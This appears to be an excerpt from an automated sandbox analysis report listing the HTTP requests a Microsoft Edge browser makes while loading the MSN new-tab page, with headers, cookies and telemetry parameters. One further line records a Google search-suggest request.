Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/storyManager.dd315fba1ee6c20bdb3d.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /service/msn/user?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=pdp-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-feed-libs.1f70b20165d70f57b9b6.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-cscore.ad7a6dce7dbdf996219b.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/super-nav.65258d4f38c7e7963827.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA12Qge8.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1713906139241&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e77229bad79f43ca83b8b957c0f02b66&activityId=e77229bad79f43ca83b8b957c0f02b66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=59892F5548B8410F875CC582C027017F&MUID=09C025F5A71D6FE2180F319FA60A6E8D HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; SM=T
Source: global traffic	HTTP traffic detected: GET /staticsb/statics//latest/icons-wc/icons/MicrosoftStartLogo_dark.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB14D0jG.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /1d6b80ab-342d-4031-8b17-fa7a415a779b/185e9ae8-e7e7-42c3-a20e-948d9a41b4bf.mp4 HTTP/1.1Host: prod-streaming-video-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, ;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoReferer: https://ntp.msn.com/Accept-Language: en-GB,en;q=0.9,en-US;q=0.8Range: bytes=0-
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/shopping-notification.ee3fd8838e9012979570.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=09C025F5A71D6FE2180F319FA60A6E8D&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=8684241135348538038&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=9f1acaf966844b9dbc23515752f37c75 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/scroll-down-button.7d3c287bfff87e892176.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /service/news/feed/pages/ntp?User=m-09C025F5A71D6FE2180F319FA60A6E8D&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&adsTimeout=600&apikey=0QfOX3Vn51YCzitbLaRkTTBadtWpgTN8NZLW0C1SEM&audienceMode=adult&backgroundImageIsSet=false&cm=en-us&column=c3&cookieWallPresent=false&disablecontent=true&infopaneCount=17&it=app&memory=8&mobile=false&newsSkip=0&newsTop=48&ocid=anaheim-ntp-feeds&pgc=547&scn=APP_ANON&timeOut=1000&vpSize=1232x876&wposchema=byregion HTTP/1.1Host: assets.msn.comConnection: keep-aliveads-referer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"OneSvc-Uni-Feat-Tun: EdgeInterestTier1Ids:null;LoginState:NA;Product:anaheim;PageName:default;PageType:dhp;OCID:msedgdhp;ViewPortWidth:1280;ViewPortHeight:984;sec-ch-ua-mobile: ?0taboola-sessionId: initUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/float-button-group-wc.1fbacdb76725a2a98312.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-others.d5ad841de853beaad9e8.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-windows-widget-shared.134e79ef7864b4274fec.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/channel-store.5b917fd7b882726d8e58.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /1d6b80ab-342d-4031-8b17-fa7a415a779b/185e9ae8-e7e7-42c3-a20e-948d9a41b4bf.mp4 HTTP/1.1Host: prod-streaming-video-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, ;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoReferer: https://ntp.msn.com/Accept-Language: en-GB,en;q=0.9,en-US;q=0.8Range: bytes=753664-763446If-Range: "0x8DAB04A5AB12E2A"
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/edge-shopping.5219588f718ef6f70a47.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/common/icons/EditImageWhite.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/common/icons/PlayWhite.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/background-gallery.b1efaf97a3eef2197024.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/common/icons/ZoomWhite.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_channel-page-utils_dist_UrlUtilities_js-libs_feed-layout_dist_Utils_js-libs_river-data-t-5c6710.8c7d0e28efea755d336f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /1d6b80ab-342d-4031-8b17-fa7a415a779b/185e9ae8-e7e7-42c3-a20e-948d9a41b4bf.mp4 HTTP/1.1Host: prod-streaming-video-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, ;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoReferer: https://ntp.msn.com/Accept-Language: en-GB,en;q=0.9,en-US;q=0.8Range: bytes=50176-753663If-Range: "0x8DAB04A5AB12E2A"
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_channel-page-utils_dist_UrlUtilities_js-libs_core_dist_interaction-tracker_MouseTracker_-01b350.30b0d21807d12cd8d7d2.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/cs-core-desktop_responsive-card_dist_index_js-libs_feed-layout_dist_Utils_js-libs_views-helpe-3fb136.ea4d6e1aa2bd59998ad3.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
